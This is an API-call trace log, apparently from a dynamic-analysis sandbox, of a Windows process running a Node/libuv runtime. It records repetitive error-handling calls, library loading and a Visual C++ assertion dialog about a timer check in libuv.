	[0100.349] strncpy (in: _Dest=0x44a8770, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
	[0100.349] strncpy (in: _Dest=0x44a8790, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
	[0100.349] strncpy (in: _Dest=0x44a87b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
	[0100.349] strncpy (in: _Dest=0x44a87d0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
	[0100.349] strncpy (in: _Dest=0x44a87f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.349] GetLastError () returned 0x0
	[0100.349] SetLastError (dwErrCode=0x0) 
	[0100.349] strncpy (in: _Dest=0x44a8810, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a8830, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a8850, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a8870, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a8890, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a88b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.350] SetLastError (dwErrCode=0x0) 
	[0100.350] strncpy (in: _Dest=0x44a88d0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.350] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a88f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a8910, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a8930, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a8950, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a8970, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.351] SetLastError (dwErrCode=0x0) 
	[0100.351] strncpy (in: _Dest=0x44a8990, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.351] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a89b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.352] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a89d0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.352] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a89f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.352] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a8a10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.352] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a8a30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.352] GetLastError () returned 0x0
	[0100.352] SetLastError (dwErrCode=0x0) 
	[0100.352] strncpy (in: _Dest=0x44a8a50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8a70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8a90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8ab0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8ad0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8af0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.353] GetLastError () returned 0x0
	[0100.353] SetLastError (dwErrCode=0x0) 
	[0100.353] strncpy (in: _Dest=0x44a8b10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.354] GetLastError () returned 0x0
	[0100.354] SetLastError (dwErrCode=0x0) 
	[0100.354] strncpy (in: _Dest=0x44a8b30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.354] GetLastError () returned 0x0
	[0100.407] SetLastError (dwErrCode=0x0) 
	[0100.407] strncpy (in: _Dest=0x44a8b50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.407] GetLastError () returned 0x0
	[0100.410] SetLastError (dwErrCode=0x0) 
	[0100.410] strncpy (in: _Dest=0x44a8b70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.410] GetLastError () returned 0x0
	[0100.410] SetLastError (dwErrCode=0x0) 
	[0100.410] strncpy (in: _Dest=0x44a8b90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.410] GetLastError () returned 0x0
	[0100.410] SetLastError (dwErrCode=0x0) 
	[0100.410] strncpy (in: _Dest=0x44a8bb0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.411] strncpy (in: _Dest=0x44a8bd0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.411] strncpy (in: _Dest=0x44a8bf0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.411] strncpy (in: _Dest=0x44a8c10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.411] strncpy (in: _Dest=0x44a8c30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.411] strncpy (in: _Dest=0x44a8c50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.411] GetLastError () returned 0x0
	[0100.411] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8c70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.412] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8c90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.412] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8cb0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.412] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8cd0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.412] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8cf0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.412] SetLastError (dwErrCode=0x0) 
	[0100.412] strncpy (in: _Dest=0x44a8d10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.412] GetLastError () returned 0x0
	[0100.413] SetLastError (dwErrCode=0x0) 
	[0100.413] strncpy (in: _Dest=0x44a8d30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.413] GetLastError () returned 0x0
	[0100.413] SetLastError (dwErrCode=0x0) 
	[0100.413] strncpy (in: _Dest=0x44a8d50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.413] GetLastError () returned 0x0
	[0100.413] SetLastError (dwErrCode=0x0) 
	[0100.413] strncpy (in: _Dest=0x44a8d70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.413] GetLastError () returned 0x0
	[0100.413] SetLastError (dwErrCode=0x0) 
	[0100.413] strncpy (in: _Dest=0x44a8d90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.413] GetLastError () returned 0x0
	[0100.413] SetLastError (dwErrCode=0x0) 
	[0100.413] strncpy (in: _Dest=0x44a8db0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.413] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8dd0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8df0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8e10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8e30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8e50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.414] SetLastError (dwErrCode=0x0) 
	[0100.414] strncpy (in: _Dest=0x44a8e70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.414] GetLastError () returned 0x0
	[0100.415] SetLastError (dwErrCode=0x0) 
	[0100.415] strncpy (in: _Dest=0x44a8e90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.415] GetLastError () returned 0x0
	[0100.415] SetLastError (dwErrCode=0x0) 
	[0100.415] strncpy (in: _Dest=0x44a8eb0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.415] GetLastError () returned 0x0
	[0100.415] SetLastError (dwErrCode=0x0) 
	[0100.415] strncpy (in: _Dest=0x44a8ed0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.415] GetLastError () returned 0x0
	[0100.415] SetLastError (dwErrCode=0x0) 
	[0100.415] strncpy (in: _Dest=0x44a8ef0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.415] GetLastError () returned 0x0
	[0100.415] SetLastError (dwErrCode=0x0) 
	[0100.415] strncpy (in: _Dest=0x44a8f10, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.415] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8f30, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8f50, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8f70, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8f90, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8fb0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.416] SetLastError (dwErrCode=0x0) 
	[0100.416] strncpy (in: _Dest=0x44a8fd0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.416] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a8ff0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a9010, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a9030, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a9050, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a9070, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.417] strncpy (in: _Dest=0x44a9090, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.417] GetLastError () returned 0x0
	[0100.417] SetLastError (dwErrCode=0x0) 
	[0100.418] strncpy (in: _Dest=0x44a90b0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.418] GetLastError () returned 0x0
	[0100.418] SetLastError (dwErrCode=0x0) 
	[0100.418] strncpy (in: _Dest=0x44a90d0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.418] GetLastError () returned 0x0
	[0100.418] SetLastError (dwErrCode=0x0) 
	[0100.418] strncpy (in: _Dest=0x44a90f0, _Source="Unknown error", _Count=0x20 | out: _Dest="Unknown error") returned="Unknown error"
	[0100.460] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x794
	[0100.463] SetEvent (hEvent=0x794) returned 1
	[0100.465] SetEvent (hEvent=0x798) returned 1
	[0100.484] SetLastError (dwErrCode=0x0) 
	[0100.484] GetLastError () returned 0x0
	[0100.484] SetLastError (dwErrCode=0x0) 
	[0100.542] SetLastError (dwErrCode=0x0) 
	[0100.542] GetLastError () returned 0x0
	[0100.542] SetLastError (dwErrCode=0x0) 
	[0100.544] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af640 | out: lpPreviousCount=0x20af640) returned 1
	[0100.545] GetEnvironmentVariableW (in: lpName="NODE_DEBUG", lpBuffer=0x209f66c, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0100.545] GetLastError () returned 0xcb
	[0100.551] SetLastError (dwErrCode=0x0) 
	[0100.551] GetLastError () returned 0x0
	[0100.551] SetLastError (dwErrCode=0x0) 
	[0100.552] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0100.552] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0100.552] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0100.552] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0100.563] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af3e0 | out: lpPreviousCount=0x20af3e0) returned 1
	[0100.564] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af4d0 | out: lpPreviousCount=0x20af4d0) returned 1
	[0100.567] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aeb08 | out: phModule=0x20aeb08*=0x77960000) returned 1
	[0100.567] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0100.567] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20aef94, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0100.567] LoadLibraryExW (lpLibFileName="USER32.DLL", hFile=0x0, dwFlags=0x800) returned 0x77810000
	[0100.568] GetProcAddress (hModule=0x77810000, lpProcName="MessageBoxW") returned 0x778901f0
	[0100.568] GetProcAddress (hModule=0x77810000, lpProcName="GetActiveWindow") returned 0x77842840
	[0100.569] GetProcAddress (hModule=0x77810000, lpProcName="GetLastActivePopup") returned 0x77842260
	[0100.569] GetProcAddress (hModule=0x77810000, lpProcName="GetUserObjectInformationW") returned 0x77848fa0
	[0100.569] GetProcAddress (hModule=0x77810000, lpProcName="GetProcessWindowStation") returned 0x77848b10
	[0100.569] IsDebuggerPresent () returned 0
	[0100.569] GetProcessWindowStation () returned 0x84
	[0100.569] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aead4, nLength=0xc, lpnLengthNeeded=0x20aeac0 | out: pvInfo=0x20aead4, lpnLengthNeeded=0x20aeac0) returned 1
	[0100.569] GetActiveWindow () returned 0x0
	[0100.570] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0101.188] SetLastError (dwErrCode=0x0) 
	[0101.188] GetLastError () returned 0x0
	[0101.188] SetLastError (dwErrCode=0x0) 
	[0101.188] GetLastError () returned 0x0
	[0101.188] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.189] SetLastError (dwErrCode=0x0) 
	[0101.189] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.190] SetLastError (dwErrCode=0x0) 
	[0101.190] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.191] SetLastError (dwErrCode=0x0) 
	[0101.191] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.192] SetLastError (dwErrCode=0x0) 
	[0101.192] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.193] GetLastError () returned 0x0
	[0101.193] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.194] SetLastError (dwErrCode=0x0) 
	[0101.194] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.195] SetLastError (dwErrCode=0x0) 
	[0101.195] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.196] SetLastError (dwErrCode=0x0) 
	[0101.196] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.197] SetLastError (dwErrCode=0x0) 
	[0101.197] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.198] SetLastError (dwErrCode=0x0) 
	[0101.198] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.199] GetLastError () returned 0x0
	[0101.199] SetLastError (dwErrCode=0x0) 
	[0101.201] GetLastError () returned 0x0
	[0101.201] SetLastError (dwErrCode=0x0) 
	[0101.201] GetLastError () returned 0x0
	[0101.201] SetLastError (dwErrCode=0x0) 
	[0101.201] GetLastError () returned 0x0
	[0101.202] SetLastError (dwErrCode=0x0) 
	[0101.202] GetLastError () returned 0x0
	[0101.202] SetLastError (dwErrCode=0x0) 
	[0101.202] GetLastError () returned 0x0
	[0101.205] SetLastError (dwErrCode=0x0) 
	[0101.205] GetLastError () returned 0x0
	[0101.205] SetLastError (dwErrCode=0x0) 
	[0101.205] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.206] SetLastError (dwErrCode=0x0) 
	[0101.206] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
